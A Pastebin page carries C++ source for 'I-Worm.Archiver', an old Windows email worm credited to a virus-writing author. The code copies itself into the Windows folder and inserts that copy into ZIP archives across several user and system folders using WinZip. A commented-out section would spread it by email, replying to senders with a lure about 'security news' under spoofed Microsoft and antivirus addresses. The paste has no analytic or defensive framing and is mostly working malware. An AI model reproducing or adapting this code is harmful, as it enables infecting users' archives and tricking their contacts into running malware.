API tools faq
paste
Advertisement
FlyFar

I-Worm.Archiver - Source Code

FlyFar
Feb 19th, 2023 (edited)
730
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 6.07 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2. Name : I-Worm.Archiver
  3. Author : PetiK
  4. Date : Mai 10th 2002 -
  5. Language : C++
  6.  
  7. Comments : Infect ZIP files which run with WINZIP.
  8.  
  9.         We can also to do the same think with PowerArchiver:
  10.             powerarc -a -c4 archive.zip virus.exe
  11.  
  12. */
  13.  
  14. #include <windows.h>
  15. #include <stdio.h>
  16. #include <mapi.h>
  17.  
  18. #pragma argused
  19. #pragma inline
  20.  
  21.  
  22. char    filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50];
  23. char    *fnam[]={"news","support","info","newsletter","webmaster"};
  24. char    *fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@viruslist.com"};
  25. LPSTR   run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
  26.     SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
  27. char    attname[]="news_xxxxxxxx.exe";
  28. LPTSTR  cmdLine,ptr;
  29. BOOL    installed;
  30. BYTE    desktop[50],favoris[50],personal[50],winzip[50];
  31. DWORD   sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris),
  32.     sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip);
  33. DWORD   type=REG_SZ;
  34. long    i;
  35.  
  36. LHANDLE session;
  37. MapiMessage *mes;
  38. MapiRecipDesc from;
  39. char messId[512],mname[50],maddr[30];
  40. HINSTANCE hMAPI;
  41.  
  42. HKEY        hReg;
  43. WIN32_FIND_DATA ffile;
  44.  
  45. void infzip(char *);
  46.  
  47. ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
  48. ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
  49. ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
  50. ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
  51. ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
  52. ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
  53.  
  54. int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
  55. {
  56.  
  57. GetModuleFileName(hInst,filen,100);
  58. GetSystemDirectory((char *)sysdir,100);
  59. GetWindowsDirectory((char *)copyn,100);
  60. strcpy(windir,copyn);
  61. strcat(copyn,"\\Archiver.exe");
  62.  
  63. installed=FALSE;
  64. cmdLine=GetCommandLine();
  65. if(cmdLine) {
  66.     for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
  67.     if(ptr[0]=='-' && ptr[1]!=0) {
  68.         switch(ptr[1]) {
  69.             default:
  70.             break;
  71.             case 'i':
  72.                 installed=TRUE;
  73.                 break;
  74.             case 'p':
  75.                 ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0);
  76.                 MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance - (c)2002",
  77.                     "I-Worm.Archiver",MB_OK|MB_ICONINFORMATION);
  78.                 ExitProcess(0);
  79.                 break;
  80.             }
  81.         }
  82.     }
  83.  
  84. if(!installed) {
  85. CopyFile(filen,copyn,FALSE);
  86. strcpy(copyreg,copyn);
  87. strcat(copyreg," -i");
  88. /* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg);
  89. RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100);
  90. RegCloseKey(hReg); */
  91. ExitProcess(0);
  92. }
  93.  
  94. RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
  95. RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
  96. RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
  97. RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
  98. RegCloseKey(hReg);
  99. RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg);
  100. RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip);
  101. RegCloseKey(hReg);
  102.  
  103. if(strlen(winzip)!=0) {
  104. infzip(windir);
  105. infzip(sysdir);
  106. infzip(desktop);
  107. infzip(personal);
  108. infzip(favoris);
  109. infzip("C:\\");
  110. }
  111.  
  112. /*
  113. _asm
  114. {
  115. call    @wininet
  116. db  "WININET.DLL",0
  117. @wininet:
  118. call    LoadLibrary
  119. test    eax,eax
  120. jz  end_asm
  121. mov ebp,eax
  122. call    @inetconnect
  123. db  "InternetGetConnectedState",0
  124. @inetconnect:
  125. push    ebp
  126. call    GetProcAddress
  127. test    eax,eax
  128. jz  end_wininet
  129. mov edi,eax
  130. verf:
  131. push    0
  132. push    Tmp
  133. call    edi
  134. dec eax
  135. jnz verf
  136.  
  137. end_wininet:
  138. push    ebp
  139. call    FreeLibrary
  140. end_asm:
  141. jmp end_all_asm
  142.  
  143. Tmp dd 0
  144.  
  145. end_all_asm:
  146. }
  147.  
  148.  
  149. hMAPI=LoadLibrary("MAPI32.DLL");
  150. (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
  151. (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
  152. (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
  153. (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
  154. (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
  155. (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
  156. mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
  157. if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
  158.   do {
  159.      if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
  160.     strcpy(mname,mes->lpOriginator->lpszName);
  161.     strcpy(maddr,mes->lpOriginator->lpszAddress);
  162.  
  163.     for(i=0;i<8;i++)
  164.     attname[i+5]='1'+(char)(9*rand()/RAND_MAX);
  165.     fsubj[0]=0;
  166.     wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]);
  167.  
  168.  
  169.     mes->ulReserved=0;
  170.     mes->lpszSubject=fsubj;
  171.     mes->lpszNoteText="This is some news send by our firm about security.\n"
  172.                 "Please read by clicking on attached file.\n"
  173.                 "\tBest Regards";
  174.     mes->lpszMessageType=NULL;
  175.     mes->lpszDateReceived=NULL;
  176.     mes->lpszConversationID=NULL;
  177.     mes->flFlags=MAPI_SENT;
  178.     mes->lpOriginator->ulReserved=0;
  179.     mes->lpOriginator->ulRecipClass=MAPI_ORIG;
  180.     mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
  181.     mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
  182.     mes->nRecipCount=1;
  183.     mes->lpRecips->ulReserved=0;
  184.     mes->lpRecips->ulRecipClass=MAPI_TO;
  185.     mes->lpRecips->lpszName=mname;
  186.     mes->lpRecips->lpszAddress=maddr;
  187.     mes->nFileCount=1;
  188.     mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
  189.     memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
  190.     mes->lpFiles->ulReserved=0;
  191.     mes->lpFiles->flFlags=NULL;
  192.     mes->lpFiles->nPosition=-1;
  193.     mes->lpFiles->lpszPathName=filen;
  194.     mes->lpFiles->lpszFileName=attname;
  195.     mes->lpFiles->lpFileType=NULL;
  196.     mSendMail(session, NULL, mes, NULL, NULL);
  197.     }
  198.   }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
  199. free(mes->lpFiles);
  200. mFreeBuffer(mes);
  201. mLogoff(session,0,0,0);
  202. FreeLibrary(hMAPI);
  203. }
  204.  
  205. */
  206.  
  207. ExitProcess(0);
  208. }
  209.  
  210. void infzip(char *folder)
  211. {
  212. register bool abc=TRUE;
  213. register HANDLE fh;
  214. if(strlen(folder)!=0) {
  215. SetCurrentDirectory(folder);
  216. fh=FindFirstFile("*.zip",&ffile);
  217. if(fh!=INVALID_HANDLE_VALUE) {
  218.     while(abc) {
  219.     inzip[0]=0;
  220.     wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
  221.     WinExec(inzip,1);
  222.     abc=FindNextFile(fh,&ffile);
  223.     }
  224. }
  225. }
  226.  
  227. }
Tags: internet worm vx petik
Advertisement
Comments
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!